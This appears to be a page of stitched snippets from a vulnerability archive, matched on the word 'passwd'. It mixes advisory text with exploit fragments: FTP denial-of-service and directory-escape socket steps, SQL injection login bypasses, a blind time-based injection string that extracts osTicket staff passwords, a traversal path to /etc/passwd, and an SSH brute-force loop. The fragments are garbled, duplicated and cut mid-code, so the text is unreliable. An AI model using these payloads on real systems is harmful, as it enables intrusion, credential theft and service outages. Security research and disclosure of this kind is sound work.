Next Page >>
passwd
If you could log on the server successfully, take the following steps and the ftp server will stop responding:
first socket connection:
1.sock.connect((hostname, 21))
2.sock.send("user %s\r\n" %username)
3.sock.send("pass %s\r\n" %passwd)
4.sock.send("PORT 127,0,0,1,122,107\r\n")
5.sock.send("APPE "+ test_string +"\r\n")
6.sock.close()
second socket connection:
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 6.06 LTS:
passwd 1:4.0.13-7ubuntu3.3
Ubuntu 7.10:
passwd 1:4.0.18.1-9ubuntu0.1
Ubuntu 8.04 LTS:
Denial of Service attack:
1.sock.connect((hostname, 21))
2.sock.send("user %s\r\n" %username)
3.sock.send("pass %s\r\n" %passwd)
4.sock.send("PORT 127,0,0,1,122,107\r\n")
5.sock.send("APPE "+ test_string +"\r\n")
6.sock.send("DELE "+ test_string +"\r\n")
7.sock.close()
will stop service:
1.sock.connect((hostname, 21))
2.sock.send("user %s\r\n" %username)
3.sock.send("pass %s\r\n" %passwd)
4.for i in range(1,20):
sock.send("SITE INDEX "+ "a"*30*i +"\r\n")
5.sock.close()
Background
==========
Horde is a web application framework written in PHP. Horde IMP, the
"Internet Messaging Program", is a Webmail module and Horde Passwd is a
password changing module for Horde.
Affected packages
=================
> 230-You are user #1 of 50 simultaneous users allowed.
> 230-
> 230 Restricted user logged in.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> get /etc/passwd passwd
> local: passwd remote: /etc/passwd
> 502 Unimplemented command.
> 227 Entering Passive Mode (192,168,2,5,219,171)
> 550 No such file.
> ftp> ls ..
230-You are user #1 of 50 simultaneous users allowed.
230-
230 Restricted user logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get /etc/passwd passwd
local: passwd remote: /etc/passwd
502 Unimplemented command.
227 Entering Passive Mode (192,168,2,5,219,171)
550 No such file.
ftp> ls ..
"MKD ../A" to create a folder named "A" outside the FTP root directory.
If you could log on the server successfully, take the following steps to create directories outside the FTP root directory:
1.sock.connect((hostname, 21))
2.sock.send("user %s\r\n" %username)
3.sock.send("pass %s\r\n" %passwd)
4.sock.send("MKD ../A\r\n")
5.sock.close()
Severity:
High
if len(sys.argv) < 3:
usage()
sys.exit(1)
ftpserver = sys.argv[1]
user = sys.argv[2]
passwd = sys.argv[3]
print "Connecting to "+ftpserver+" using "+user+"....",
# Try opening a connection to the FTP server
try:
Let's see the details.
- PHP filesystem functions path normalization attack
PHP normalizes / and /. in path names allowing for example
/etc/passwd/ or /etc/passwd/. to be succesfully opened as a file.
- PHP filesystem functions path truncation attack
PHP has a path truncation issue (a badly implemented snprintf())
allowing only MAX_PATH chars to be evaluated when actually opening a
# otherwise exploit could become less reliable.
# So let's rm some junk before exploiting our app...
for (my $count = 30; $count >= 1; $count--) {
my $ssh2 = Net::SSH2->new();
$ssh2->connect($ip, $port) || die "[-] Connnection Failed!";
$ssh2->auth_password($user,$pass)|| die "Wrong Username or Passwd!";
$ssh2->disconnect();
}
my $ssh2 = Net::SSH2->new();
$ssh2->connect($ip, $port) || die "[-] Connnection Failed!";
$ssh2->auth_password($user,$pass)|| die "Wrong Username or Passwd!";
----------------
Publication :11/02/2008
----------------
Affected Software : IPDiva VPNSSL
Versions :
Users who autenticate with login et passwd without OTP systems
* 2.2 branch < 2.2.8.84
* 2.3 branch < 2.3.2.14
-------------------
Vulnerability : Brute force attack
TPTI-09-08: HP OpenView NNM ovlogin.exe CGI userid/passwd Heap Overflow Vulnerability
http://dvlabs.tippingpoint.com/advisory/TPTI-09-08
December 9, 2009
-- CVE ID:
CVE-2009-3846
-- Affected Vendors:
Hewlett-Packard
> > which leads to a successful login. Different account logins can be
> > made successful using the limit clase (e.g appending "LIMIT 5,1"
> > will make you login with as the 5th account in the users table).
> >
> > As far as I can see in the mysql logs the query becomes:
> > SELECT userid, passwd, uid, gid, homedir, shell FROM users WHERE
> > (userid='{UNKNOWN TAG}') and 1=2 union select
> > 1,1,uid,gid,homedir,shell from users limit 1,1; -- ') LIMIT 1
> I can see proper escaping even when varying the SQL code provided.
> Here the MySQL log excerpt:
>
...
..
...
line 29:
$passwd = md5($_POST[userPassword]); // md5 hash password
if($_POST[userType] != 'Staff')
{$sql = "SELECT userID, userName
FROM user_account
WHERE userAccount='$_POST[userAccount]' AND
Usage()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
test_string='a'
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
> and a password of "1" (without quotes).
>
> which leads to a successful login. Different account logins can be made successful using the limit clase (e.g appending "LIMIT 5,1" will make you login with as the 5th account in the users table).
>
> As far as I can see in the mysql logs the query becomes:
> SELECT userid, passwd, uid, gid, homedir, shell FROM users WHERE (userid='{UNKNOWN TAG}') and 1=2 union select 1,1,uid,gid,homedir,shell from users limit 1,1; -- ') LIMIT 1
I can see proper escaping even when varying the SQL code provided. Here
the MySQL log excerpt:
SELECT username, password, uid, gid, homedir, shell FROM ftp WHERE
(username='USER%\') and 1=2 union select 1,1,uid,gid,homedir,shell from
The attack is enabled by two factors:
1. New line character (ASCII 0x0A) is allowed in user passwords
2. *NIX connectors utilize send-expect technique to interact
with 'passwd' program, but fails to handle passwords
containing new line characters.
In the process of changing the user password to a value containing a
newline the interaction between the IDM connector and UNIX shell goes
out of sync and the password gets executed by UNIX shell running as root.
...
function SEC_authenticate($username, $password, &$uid)
{
global $_CONF, $_TABLES, $LANG01;
$result = DB_query("SELECT status, passwd, email, uid FROM {$_TABLES['users']} WHERE username='$username' AND ((remoteservice is null) or (remoteservice = ''))"); //<------------------- SQL INJECTION HERE
$tmp = DB_error();
$nrows = DB_numRows($result);
if (($tmp == 0) && ($nrows == 1)) {
$U = DB_fetchArray($result);
which leads to a successful login. Different account logins can be made successful using the limit clase (e.g appending "LIMIT 5,1" will make you login with as the 5th account in the users table).
As far as I can see in the mysql logs the query becomes:
SELECT userid, passwd, uid, gid, homedir, shell FROM users WHERE (userid='{UNKNOWN TAG}') and 1=2 union select 1,1,uid,gid,homedir,shell from users limit 1,1; -- ') LIMIT 1
I think the problem lies in the handling of the "%" character (probably that's some way to sanitize input to avoid format string things?).
Anyway, %' effectively makes the single quote unescaped and that eventually allows for an SQL injection during login.
# ----------------------
from ftplib import FTP
import time
ip="127.0.0.1"
login="anonymous"
passwd = 'gorion@scriptkiddie.pl'
print '-------------------------------'
print '| HOME FTP SERVER DoS Exploit |'
print '| bY 0in From Dark-Coders! |'
print '|>>http://dark-coders.4rh.eu<<|'
print '-------------------------------'
Something (signup for ex.) --> column: Alias
Or...
./../../../etc/passwd --> column: Dateiname
Something (signup for ex.) --> column: Alias
Then, we go to:
There's a funny bug in novell client, a while ago a stack based overflow was present in the username field.
this as been patched, but i guess not properlly.
You have a username field limited to 255 chars, but when you fill up this field , and press login button
it tells you "not loggued in".
If you click on the "forgot passwd" link, it will popup a little windows with your username supplied printed,
stack based overflow occurs here, Allowing code execution .
=====
> #9 Telnet service enabled by default
Anyone in LAN is able to log in using default admin:admin account with root privileges. There is no possibility to change this password (sic!)
You can change telnet admin password on this device.
1. telnet as admin with passwd admin
2. type: nvram set admin_passwd=SOMESTRONGPASSWD <enter>
3. type: nvram commit <enter>
4. restart router (by switching off the power)
thats all
traverse directories and include any given php file within the system
leading
to a local file inclusion attack.
Note: Omitting '.php' extension (to include arbitrary file like /etc/
passwd)
by using a NULL character will not be possible in this case as a
combination of %00 in the REQUEST_URI will not get decoded by the web
server
automatically and there is no urldecode function to decode it before the
require_once call either.
to perform
a full upgrade at this time.
One sample attack string might look similar to the following:
'+(SELECT
IF(SUBSTRING(passwd,1,1)=CHAR(48),BENCHMARK(1000000,SHA1(1)),0) passwd
FROM ost_staff where staff_id=1) and '1'='1
III. REFERENCES
[1] - http://www.osticket.com
[2] - http://osticket.com/forums/project.php?issueid=118
Usage()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("Connection error!")
+ (statbuf.st_mode & 022) == 0) {
+ if (CGIG(suexec_base_dir) && !strncmp(real_path, CGIG(suexec_base_dir), strlen(CGIG(suexec_base_dir)))) {
+ path_ok = 1;
+ }
+ if (!path_ok && CGIG(suexec_user_dir)) {
+ struct passwd* pw = getpwuid(geteuid());
+ size_t len = strlen(pw->pw_dir) + 1 + strlen(CGIG(suexec_user_dir)) + 2;
+ char * user_dir = malloc(len);
+ strcpy(user_dir, pw->pw_dir);
+ strlcat(user_dir, "/", len);
+ strlcat(user_dir, CGIG(suexec_user_dir), len);
}
- ---
the last step in curl_init() function will only copy file://safe_mode_bypass to urlcopy.
The main problem exists in php_url_parse_ex() function. If you put in curl_init() "file://host/somewhere/path.php", php_url_parse_ex() will select /somewhere/path.php to path varible. Looks good but it cannot be used, when you will check real path. Using file:///etc/passwd is correct but between file:// and /etc/passwd, php_url_parse_ex() will select host and return path to /passwd.
Tested in PHP 5.2.4 and PHP 5.2.5 (FreeBSD 6.2R)
cxib# php -v
PHP 5.2.5 with Suhosin-Patch 0.9.6.2 (cli) (built: Dec 10 2007 19:54:41) (DEBUG)
Complete these steps:
1. Change the root password by using the following command:
shell# passwd
2. Reboot to activate the new settings by using the following command:
shell# reboot
Next Page>>
|
